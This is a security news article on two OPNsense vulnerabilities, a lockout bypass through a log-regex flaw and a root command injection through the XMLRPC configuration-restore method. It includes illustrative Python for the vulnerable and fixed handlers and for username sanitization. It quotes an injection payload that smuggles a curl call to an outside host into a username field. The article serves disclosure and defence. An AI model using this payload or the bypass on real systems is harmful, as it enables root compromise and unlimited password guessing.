OPNsense, the widely deployed FreeBSD-based firewall and routing platform, has released a critical security update to address two significant vulnerabilities that could allow attackers to bypass security controls and seize total control of the system. The platform, favored by organizations for its “rich feature set of commercial offerings with the benefits of open and verifiable sources,” faces a rare breach in its defensive logic.
The technical details and proof-of-concept (PoC) exploit scripts for both flaws have been publicly disclosed, raising the stakes for administrators who have not yet updated.
The first vulnerability (CVE-2026-44195, CVSS 5.3) involves a clever logic flaw in the lockout_handler. Under normal circumstances, OPNsense tracks failed login attempts and bans offending IPs once a threshold is reached.
However, researchers discovered that the handler erroneously processes “success” keywords like “Accepted” or “Successful login” even when the overall authentication fails. Because the WebGUI log embeds the raw, attacker-provided username, an attacker can submit a failed login attempt using the username “Accepted”.
According to the disclosure, “The handler evaluates this log line, matches the .*Accepted.* regex first, and erroneously treats the failed login as a successful authentication. This triggers the reset logic, clearing any accumulated failure points for the attacker’s IP”.
By oscillating between a real guess and a “reset” guess, the failure counter never reaches the lockout threshold, allowing for infinite brute-force attempts against both the UI and SSH password logins.
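The classification mistake described above, reduced to a small simulation. This is an added example written for this article, not OPNsense's own lockout_handler code or the published PoC: the log-line format, the regexes and the threshold are assumptions, and the lines themselves are constructed. It contrasts a handler that evaluates the success pattern first with one that evaluates failure entries first, the ordering the patch adopts.

```python
import re
from collections import defaultdict

# Constructed sample log lines in an assumed WebGUI-style format (not the real
# OPNsense format). The third entry is a failed login whose username is the
# word "Accepted", exactly the trick the advisory describes.
LOG_LINES = [
    "webgui: Failed login for user 'admin' from: 203.0.113.7",
    "webgui: Failed login for user 'root' from: 203.0.113.7",
    "webgui: Failed login for user 'Accepted' from: 203.0.113.7",
    "webgui: Failed login for user 'admin' from: 203.0.113.7",
    "webgui: Successful login for user 'alice' from: 198.51.100.2",
]

THRESHOLD = 3  # assumed lockout threshold for the example

# Unanchored patterns, as in the disclosed flaw: they match anywhere in the line,
# including inside the attacker-controlled username.
SUCCESS_RE = re.compile(r".*Accepted.*|.*Successful login.*")
FAILURE_RE = re.compile(r".*Failed login.*")
IP_RE = re.compile(r"from: (\S+)$")


def _source_ip(line: str) -> str:
    """Extract the client address from a log line (assumed format)."""
    match = IP_RE.search(line)
    return match.group(1) if match else "unknown"


def vulnerable_handler(lines: list[str]) -> set[str]:
    """Success pattern is checked first. A failed login with username
    'Accepted' therefore matches SUCCESS_RE and resets the counter."""
    strikes: dict[str, int] = defaultdict(int)
    banned: set[str] = set()
    for line in lines:
        ip = _source_ip(line)
        if SUCCESS_RE.match(line):
            strikes[ip] = 0          # reset logic fires on the poisoned line
        elif FAILURE_RE.match(line):
            strikes[ip] += 1
            if strikes[ip] >= THRESHOLD:
                banned.add(ip)
    return banned


def fixed_handler(lines: list[str]) -> set[str]:
    """Failure entries are evaluated before success entries, so a failed login
    is counted as a failure regardless of what the username contains."""
    strikes: dict[str, int] = defaultdict(int)
    banned: set[str] = set()
    for line in lines:
        ip = _source_ip(line)
        if FAILURE_RE.match(line):
            strikes[ip] += 1
            if strikes[ip] >= THRESHOLD:
                banned.add(ip)
        elif SUCCESS_RE.match(line):
            strikes[ip] = 0
    return banned


if __name__ == "__main__":
    print("vulnerable order bans:", vulnerable_handler(LOG_LINES))  # set()
    print("fixed order bans:     ", fixed_handler(LOG_LINES))       # {'203.0.113.7'}
```

With four failures from the same address, the vulnerable ordering never reaches the threshold because the third line resets the counter, while the fixed ordering bans the address on the third failure. A further hardening step a reviewer would ask for is to anchor the success pattern to the fixed part of the message rather than letting it match anywhere in free text that embeds user input.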
The second, more severe flaw (CVE-2026-44193) allows Remote Code Execution (RCE) with root privileges. The vulnerability resides in the opnsense.restore_config_section method, which fails to sanitize user-supplied input.
The exploit targets a lack of sanitization over CLI parameters in the auth.inc file. An attacker with XMLRPC Library privileges can craft a malicious configuration containing a command injection in the username field, for example: kch2;curl 192.168.236.1:8000/$(whoami);#.
When the firewall subsequently reloads its services or performs a synchronization, this malicious string is passed directly into a shell command (/usr/sbin/pw). This grants the attacker a remote shell with root access on the firewall host, effectively bypassing all local security measures.
The OPNsense team has moved quickly to patch these flaws. The update addresses the lockout bypass by rearranging the regex evaluation order (ensuring that error entries are checked before “success” matches) and implements stricter sanitization for the XMLRPC endpoint.
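The sanitization point above, illustrated with an added example that is not OPNsense's patch or its auth.inc code. It assumes a username allowlist of the kind used for POSIX account names and a hypothetical wrapper that builds an argument vector for /usr/sbin/pw; the point is that a restored configuration value must be validated against an allowlist before it reaches an account-management command, and that the command should be invoked with an argument list rather than through a shell so metacharacters are never interpreted.

```python
import re
import shlex

# Allowlist for account names (an assumption for this example, not the exact
# rule OPNsense applies): lowercase start, then letters, digits, '_' or '-'.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def is_safe_username(name: str) -> bool:
    """True only when the name contains nothing a shell could interpret."""
    return USERNAME_RE.fullmatch(name) is not None


def build_pw_argv(name: str, uid: int, home: str) -> list[str]:
    """Build the argv for a hypothetical call to /usr/sbin/pw useradd.

    Returning a list (to be passed to subprocess.run with shell=False) means
    no shell ever parses the username, so ';' or '$(...)' inside it would be
    a literal argument even if validation were somehow skipped. Validation is
    still applied first so that a bad value is rejected at the boundary.
    """
    if not is_safe_username(name):
        raise ValueError(f"rejected username: {name!r}")
    return ["/usr/sbin/pw", "useradd", "-n", name, "-u", str(uid), "-d", home]


def render_for_log(argv: list[str]) -> str:
    """Quote the argv for a log line so it can be audited safely."""
    return " ".join(shlex.quote(part) for part in argv)


if __name__ == "__main__":
    # Constructed inputs: a benign name and the injection string from the advisory.
    for candidate in ["kch2", "kch2;curl 192.168.236.1:8000/$(whoami);#"]:
        try:
            argv = build_pw_argv(candidate, 1001, "/home/kch2")
            print("accepted:", render_for_log(argv))
        except ValueError as err:
            print("blocked: ", err)
```

The validator rejects the advisory's payload outright, and because the accepted name is placed into an argument list rather than interpolated into a shell string, the same class of injection is also blocked at the invocation layer.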
With a functional Python-based PoC for the lockout bypass and documented XML requests for the RCE already circulating in the security community, the OPNsense team recommends that all users upgrade immediately to the patched 26.1.7 release.